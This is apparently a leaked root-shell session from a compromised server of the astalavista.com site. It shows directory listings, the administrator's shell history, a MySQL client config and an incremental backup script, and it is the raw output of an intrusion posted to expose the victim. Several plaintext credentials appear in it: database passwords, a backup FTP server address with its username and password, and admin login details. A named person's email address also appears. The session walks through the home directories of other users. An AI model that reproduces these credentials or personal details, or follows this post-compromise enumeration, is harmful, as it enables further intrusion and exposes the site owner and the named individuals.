- -rw-r--r-- 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
- drwx------ 2 root root 4096 Oct 28 2007 .elinks
- drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
- -rw-r--r-- 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
- -rw------- 1 root root 0 Apr 16 13:19 .history
- -rw-r--r-- 1 root root 16095 Sep 11 2007 install.log
- -rw-r--r-- 1 root root 2566 Sep 11 2007 install.log.syslog
- -rw-r--r-- 1 root root 1003 Jul 22 2007 install.sh
- -rw------- 1 root root 35 Jun 2 14:23 .lesshst
- drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
- drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
- -rw-r--r-- 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
- -rw-r--r-- 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
- -rwx------ 1 root root 760 Sep 18 2008 lp
- drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
- -rw-r--r-- 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
- -rw-r--r-- 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
- drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
- -rw-r--r-- 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
- drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
- -rw-r--r-- 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
- -rw-r--r-- 1 root root 25316 Feb 15 2006 mybk.sh
- -rw------- 1 root root 41 Oct 19 2007 .my.cnf
- -rw------- 1 root root 2902 Jun 4 08:40 .mysql_history
- -rwx------ 1 root root 38873 Apr 16 2008 mysqlreport
- -rw------- 1 root root 41 May 20 2008 .mytop
- drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
- -rw-r--r-- 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
- drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
- -rw------- 1 root root 1462 Sep 21 2007 opt.php
- -rw-r--r-- 1 root root 3371 Sep 22 2007 p
- -rw-r--r-- 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
- -rw------- 1 root root 1024 Feb 3 21:32 .rnd
- -rw-r--r-- 1 root root 716 Nov 28 2007 server.csr
- -rw-r--r-- 1 root root 887 Nov 28 2007 server.key
- drwx------ 2 root root 4096 Oct 10 2008 .ssh
- -rw-r--r-- 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
- -rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
- -rw-r--r-- 1 root root 104874307 Oct 17 2007 test100.zip
- -rw-r--r-- 1 root root 67085540 Oct 19 2007 test100.zip.1
- drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
- -rw-r--r-- 1 root root 42596 May 21 2007 tuning-primer.sh
- drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
- -rw-r--r-- 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
- -rw------- 1 root root 12997 May 16 2008 .viminfo
- sh-3.2# cat .bash_history
- [snip]
- wget cp4sst.com/sstlinux.tar.gz
- tar zxvf sstlinux.tar.gz
- cd linux-2.6.27.10
- sh install.sh
- make bzImage ; make modules ; make modules_install ; make install
- make clean
- service mysqld restart
- [snip]
- cd /usr/sbin/
- chmod 4777 traceroute
- chmod 4777 ping
- traceroute -I www.astalavista.ch
- [snip]
- vi /etc/csf/csf.conf
- traceroute google.ch
- service csf restart
- tracert google.ch
- service csf restart
- traceroute www.google.ch
- tracert www.google.ch
- traceroute www.google.ch
- locate traceroute
- chown 4755 /bin/traceroute
- chown 4777 /bin/traceroute
- locate ping
- chown 4755 /bin/ping
- chown 4777 /bin/ping
- cd /bin/
- ls -ali | grep ping
- chown root ping
- chmod 4755 ping
- ls -ali | grep traceroute
- chown root traceroute
- chmod 4755 traceroute
- ls -ali | grep traceroute
- traceroute -I www.google.ch
- traceroute www.google.ch
- whois pmsantos.ch
- [snip]
- mysql -h com_contrexx2_live < /root/defaultp_ports.sql
- mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
- mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
- mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
- top
- ping ssth.ch
- ping asdlkfaljgasd???ljg???lasj.ch
- ping asdlkfaljgasdlasj.ch
- ping www.ssth.ch
- ping ssth.ch
- nslookup www.google.ch
- nslookup www.ssth.ch
- man nslookup
- ping www.google.ch
- nslookup www.google.ch
- nslookup www.google.ch
- nslookup salfjasdlf.ch
- [snip]
- openssl passwd -1 sadf
- openssl passwd -1 5cZNHstdTy
- mysql
- mysql
- locate proftp
- vi /etc/proftpd.passwd
- service proftpd restart
- locate proftpd.conf
- vi /etc/proftpd.conf
- vi /etc/proftpd.passwd
- service proftpd restart
- [snip]
- /bin/sh /home/com/backup_system/backup.sh
- tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
- mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
- mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
- ls -ali
- mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
- mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
- crontab -l
- crontab -l
- php -q /home/com/public_html/modifications/cronjobs/securitynews.php
- /home/com/public_html/modifications/cronjobs/exploits.sh
- wget http://www.litespeedtech.com/packages/4.0/lsws-4.0.3-ent-x86_64-linux.tar.gz
- tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
- cd lsws-4.0.3
- sh install.sh
- uptime
- hdparm -tt /dev/sda
- iostat
- yum install iostat
- iostat
- whereis iostat
- yjm clean all
- yum clean all ; yum -y update
- iostat
- yum install systat
- rpm -qa | grep iostat
- rpm -qa | grep sysstat
- rpm -qa | grep systat
- dmesg -c
- sysctl -p
- uname -r
- cd /usr/src
- wget nix101.com/kernels/sstlinux.tar.gz
- shutdown -r now
- nano -w /boot/grub/grub.conf
- sh-3.2# cat .my.cnf
- [client]
- user=da_admin
- password=X9dctmRH
- sh-3.2# cat /home/com/backup_system/backup.sh
- #!/bin/sh
- #####################################################################
- # #
- # incremental backup for astalavista.com #
- # #
- # author: Paulo M. Santos <paulo.santos@astalavista.com> #
- # #
- #####################################################################
- [snip]
- PROG_DIR="/home/com/backup_system";
- BACKUP_DIR="/home/com/backups";
- DOBACKUP_FROM="/home/com/domains/astalavista.com/public_html";
- # ftp for synology backup server
- FTP_HOST="212.254.194.163";
- FTP_PORT="21";
- FTP_USER="astalavista.com";
- FTP_PASS="yWHOJbzpWTWC6Xrmg1WnfBk5V";
- FTP_DIR="/astalavista.com";
- # database
- DB_HOST="localhost";
- DB_USER="contrexxuser2";
- DB_PASS="0fEYNZgXz1pKe";
- DB_DATABASE1="com_contrexx2_live";
- DB_DATABASE2="com_contrexx2";
- [snip]
- ftp -in $FTP_HOST $FTP_PORT <<EOF
- quote USER $FTP_USER
- quote PASS $FTP_PASS
- cd $FTP_DIR
- put $DB_FULLNAME-SQL_Dump.tar
- put $BACKUP_FULLNAME-Public_HTML.tar
- close
- bye
- EOF
- sh-3.2# cd /home
- sh-3.2# ls -la
- total 120
- drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
- drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
- drwx--x--x 9 admin admin 4096 Nov 28 2007 admin
- -rw------- 1 root root 8192 Jun 4 03:03 aquota.group
- -rw------- 1 root root 8192 Jun 3 02:45 aquota.user
- drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 astanet
- drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
- drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
- drwx--x--x 10 com com 4096 Apr 28 12:40 com
- drwxr-xr-x 2 root root 4096 May 17 2007 ftp
- drwx------ 3 jon jon 4096 Sep 21 2007 jon
- drwx------ 2 root root 16384 Sep 11 2007 lost+found
- drwxr-xr-x 2 root root 4096 Sep 14 2007 my
- drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
- drwx------ 2 jon jon 4096 Sep 15 2007 test
- drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
- sh-3.2# cd admin
- sh-3.2# ls -la
- total 1735896
- drwx--x--x 9 admin admin 4096 Nov 28 2007 .
- drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
- drwx------ 2 admin admin 4096 Sep 28 2007 backups
- -rw------- 1 admin admin 860 Sep 17 2008 .bash_history
- -rw-r--r-- 1 admin admin 24 Sep 14 2007 .bash_logout
- -rw-r--r-- 1 admin admin 176 Sep 14 2007 .bash_profile
- -rw-r--r-- 1 admin admin 124 Sep 14 2007 .bashrc
- drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
- drwx--x--x 6 admin admin 4096 Sep 21 2007 domains
- drwxrwx--- 3 admin mail 4096 Sep 21 2007 imap
- -rw-r--r-- 1 root root 24 Sep 21 2007 info.php
- drwx------ 2 admin admin 4096 Sep 21 2007 mail
- -rw-r--r-- 1 root root 716 Nov 28 2007 server.csr
- -rw-r--r-- 1 root root 887 Nov 28 2007 server.key
- -rw-r----- 1 admin mail 34 Sep 14 2007 .shadow
- -rw-r----- 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
- drwx--x--x 2 admin admin 4096 Jul 29 2008 user_backups
- sh-3.2# ..
- sh-3.2# cd jon
- sh-3.2# ls -la
- total 36
- drwx------ 3 jon jon 4096 Sep 21 2007 .
- drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- -rw------- 1 jon jon 53 Sep 21 2007 .bash_history
- -rw-r--r-- 1 jon jon 24 Sep 21 2007 .bash_logout
- -rw-r--r-- 1 jon jon 176 Sep 21 2007 .bash_profile
- -rw-r--r-- 1 jon jon 124 Sep 21 2007 .bashrc
- -rw-r--r-- 1 root root 24 Sep 21 2007 info.php
- drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
- sh-3.2# cd ..
- sh-3.2# cd test
- sh-3.2# ls -la
- total 48
- drwx------ 2 jon jon 4096 Sep 15 2007 .
- drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- -rw--